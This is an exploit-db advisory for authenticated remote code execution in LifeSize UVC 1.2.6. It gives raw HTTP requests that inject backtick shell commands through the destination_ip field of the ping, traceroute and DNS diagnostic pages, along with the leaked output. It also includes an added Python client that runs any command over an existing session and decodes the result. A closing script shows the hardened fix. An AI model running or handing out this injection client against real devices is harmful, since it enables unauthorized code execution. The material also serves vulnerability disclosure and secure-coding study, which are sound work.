LifeSize UVC 1.2.6 – (Authenticated) Remote Code Execution

  • Author: Brandon Perry
    Date: 2014-03-22
  • Source: https://www.exploit-db.com/exploits/32437/
  • LifeSize UVC 1.2.6 authenticated vulnerabilities (every request below needs a valid sessionid cookie plus the matching csrftoken; the injection point in all three is the destination_ip form field, which is passed to a shell unescaped)
     
    RCE as www-data via the ping diagnostic (shell command injection in destination_ip):
     
    POST /server-admin/operations/diagnose/ping/ HTTP/1.1
    Host: 172.31.16.99
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: https://172.31.16.99/server-admin/operations/diagnose/ping/
    Cookie: csrftoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx; sessionid=2872e94ecc65c01161fb19e9f45da579
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 118
     
    csrfmiddlewaretoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx&source_ip=172.31.16.99&destination_ip=goo`whoami`gle.com
     
    The above POST results in a response containing:
    <span class="red_txt">ping: unknown host goowww-datagle.com</span><br/>
     
    RCE as www-data via the traceroute diagnostic (same injection in destination_ip):
     
    POST /server-admin/operations/diagnose/trace/ HTTP/1.1
    Host: 172.31.16.99
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: https://172.31.16.99/server-admin/operations/diagnose/trace/
    Cookie: csrftoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx; sessionid=2872e94ecc65c01161fb19e9f45da579
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 101
     
    csrfmiddlewaretoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx&source_ip=172.31.16.99&destination_ip=go`whoami`ogle.com
     
    Results in the following error (traceroute's resolver failure, with the whoami output spliced into the hostname):
    gowww-dataogle.com: Name or service not known
     
    RCE as www-data via the DNS lookup diagnostic (same injection in destination_ip; query_type is passed to dig -t):
     
    POST /server-admin/operations/diagnose/dns/ HTTP/1.1
    Host: 172.31.16.99
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: https://172.31.16.99/server-admin/operations/diagnose/dns/
    Cookie: csrftoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx; sessionid=2872e94ecc65c01161fb19e9f45da579
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 116
     
    csrfmiddlewaretoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx&source_ip=172.31.16.99&destination_ip=go`whoami`ogle.com&query_type=ANY
     
    Results in the following dig output (the command output is visible in the queried name on the header and QUESTION lines):
    ; <<>> DiG 9.7.0-P1 <<>> -t ANY gowww-dataogle.com -b 172.31.16.99
    ;; global options: +cmd
    ;; Got answer:
    ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 54663
    ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
     
    ;; QUESTION SECTION:
    ;gowww-dataogle.com. IN ANY
     
    ;; AUTHORITY SECTION:
    com. 890 IN SOA a.gtld-servers.net. nstld.verisign-grs.com. 1395411948 1800 900 604800 86400
     
    ;; Query time: 21 msec
    ;; SERVER: 8.8.8.8#53(8.8.8.8)
    ;; WHEN: Fri Mar 21 10:26:21 2014
    ;; MSG SIZE rcvd: 109
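The three requests above differ only in path and in the dns page's extra query_type field, and all three leak the command output by echoing the mangled hostname back. The following script is an added example, not code from the advisory: it wraps a command in the same split hostname, sends it to any of the three endpoints with an existing session, and cuts the output back out of the response. The endpoint paths, form fields and marker hostnames are taken from the requests above; the urllib sender (TLS verification disabled for the appliance's self-signed certificate) and the base64 wrapping for multi-token output are this example's own assumptions.

```python
"""Client helpers for the LifeSize UVC 1.2.6 diagnostic command injection.

Added example, not code from the original advisory.  The endpoint paths,
form fields and marker hostnames come from the three requests above; the
HTTP sender (urllib, TLS verification disabled for the appliance's
self-signed certificate) and the base64 wrapping are this example's own
assumptions about how a practitioner would script the check."""
import base64
import re
import ssl
import urllib.parse
import urllib.request

DIAG_PATHS = {
    "ping": "/server-admin/operations/diagnose/ping/",
    "trace": "/server-admin/operations/diagnose/trace/",
    "dns": "/server-admin/operations/diagnose/dns/",
}
PREFIX, SUFFIX = "goo", "gle.com"   # same split hostname as goo`whoami`gle.com


def build_payload(cmd, encode=False, prefix=PREFIX, suffix=SUFFIX):
    """Wrap a command in backticks inside a hostname.  The shell expands the
    backticks before ping/traceroute/dig see the argument, so the command's
    stdout ends up spliced into the 'unknown host' error.  With encode=True
    the output is base64'd first: whoami is one token, but anything with
    spaces or newlines (id, uname -a) would be split into separate
    arguments and only the first piece would come back."""
    if encode:
        cmd = "%s|base64|tr -d '\\n'" % cmd
    return "%s`%s`%s" % (prefix, cmd, suffix)


def build_form(csrftoken, source_ip, destination_ip, query_type=None):
    """Form body as the browser sends it; query_type only for the dns page."""
    fields = {"csrfmiddlewaretoken": csrftoken, "source_ip": source_ip,
              "destination_ip": destination_ip}
    if query_type:
        fields["query_type"] = query_type
    return urllib.parse.urlencode(fields)


def recover(body, encoded=False, prefix=PREFIX, suffix=SUFFIX):
    """Pull the command output back out of the response.  All three pages
    echo the mangled hostname ('unknown host goowww-datagle.com',
    'gowww-dataogle.com: Name or service not known', the dig QUESTION
    line), so it is whatever sits between the two markers."""
    m = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), body, re.S)
    if not m:
        return None
    out = m.group(1)
    return base64.b64decode(out).decode(errors="replace") if encoded else out


def send_diagnostic(base_url, endpoint, csrftoken, sessionid, source_ip,
                    cmd, encode=True, query_type="ANY"):
    """POST the injection to one endpoint using an already-authenticated
    session and return the recovered output.  Django's CSRF middleware on
    HTTPS also insists on a same-origin Referer, hence the header."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    url = base_url.rstrip("/") + DIAG_PATHS[endpoint]
    body = build_form(csrftoken, source_ip, build_payload(cmd, encode),
                      query_type if endpoint == "dns" else None)
    req = urllib.request.Request(url, data=body.encode(), method="POST", headers={
        "Referer": url,
        "Cookie": "csrftoken=%s; sessionid=%s" % (csrftoken, sessionid),
        "Content-Type": "application/x-www-form-urlencoded",
    })
    with urllib.request.urlopen(req, context=ctx, timeout=30) as resp:
        return recover(resp.read().decode(errors="replace"), encoded=encode)


if __name__ == "__main__":
    import sys
    # usage: python uvc_diag.py https://172.31.16.99 ping CSRFTOKEN SESSIONID 172.31.16.99 id
    base, ep, csrf, sess, src, *cmd = sys.argv[1:]
    print(send_diagnostic(base, ep, csrf, sess, src, " ".join(cmd)))
```

The base64 step matters for anything beyond whoami: the shell performs word splitting on the substituted output, so `id` would hand ping several arguments and only the first fragment would appear in the error text. Encoding the output keeps it a single token, and recover() decodes it on the way back.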
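The root cause in all three diagnostics is the same: a form value is interpolated into a command line that a shell parses. The following is an added example, not LifeSize's code or the vendor's fix: a reconstruction of the likely vulnerable shape beside the hardened form a reviewer would ask for (validate the target as an IP literal or a syntactic hostname, then execute an argv list with no shell). The dig invocation (-t TYPE host -b source) is taken from the output above; the ping and traceroute flags, the function names and the accepted query types are this example's assumptions.

```python
"""Added example: the shell-interpolation pattern the three diagnostics
evidently use, beside a hardened replacement.  LifeSize's server-admin
code is not public, so vulnerable_command() is a reconstruction of the
likely shape, and the ping/traceroute flags in safe_argv() are this
example's assumptions; only the dig form (-t TYPE host -b source) is
taken from the output shown above.  This is not the vendor's fix."""
import ipaddress
import re
import subprocess

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens,
# no leading/trailing hyphen, 63 chars per label, 253 overall.
_LABEL = r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
HOSTNAME_RE = re.compile(r"^(?=.{1,253}$)(?:%s\.)*%s\.?$" % (_LABEL, _LABEL), re.I)
QUERY_TYPES = {"A", "AAAA", "CNAME", "MX", "NS", "PTR", "SOA", "TXT", "ANY"}


def vulnerable_command(source_ip, destination_ip):
    """The bug: form values pasted into a command string that a shell
    parses, so goo`whoami`gle.com runs whoami as www-data."""
    return "ping -c 3 -I %s %s" % (source_ip, destination_ip)


def demo_shell_expansion(destination_ip):
    """What the shell does with such a value, with echo standing in for
    ping so it runs anywhere: the backtick section executes and its
    output is spliced into the argument (goo`whoami`gle.com -> goo<user>gle.com)."""
    return subprocess.run(["sh", "-c", "echo " + destination_ip],
                          capture_output=True, text=True).stdout.strip()


def validate_target(value):
    """Accept an IP literal or a syntactic hostname, nothing else.  The
    label grammar excludes every shell metacharacter (` $ ; | & < > space)
    and a leading '-', so the value cannot become an option either."""
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        pass
    if HOSTNAME_RE.match(value):
        return value
    raise ValueError("invalid target: %r" % value)


def is_valid_target(value):
    try:
        validate_target(value)
        return True
    except ValueError:
        return False


def safe_argv(tool, source_ip, destination_ip, query_type=None):
    """Build an argv list (no shell) from validated inputs."""
    src = str(ipaddress.ip_address(source_ip))   # must be an IP, not a name
    dst = validate_target(destination_ip)
    if tool == "ping":
        return ["ping", "-c", "3", "-I", src, dst]
    if tool == "trace":
        return ["traceroute", "-s", src, dst]
    if tool == "dns":
        if query_type not in QUERY_TYPES:
            raise ValueError("unsupported query type: %r" % query_type)
        return ["dig", "-t", query_type, dst, "-b", src]
    raise ValueError("unknown tool: %r" % tool)


def run_diagnostic(tool, source_ip, destination_ip, query_type=None):
    """Hardened form: argv list, shell=False, bounded runtime."""
    argv = safe_argv(tool, source_ip, destination_ip, query_type)
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=30)
    return proc.stdout + proc.stderr
```

Note that dropping the shell alone is not enough: a value such as -c or --option would still be parsed by the tool as a flag, which is why the hostname grammar forbids a leading hyphen, and why query_type is checked against a fixed list rather than handed to dig -t as received.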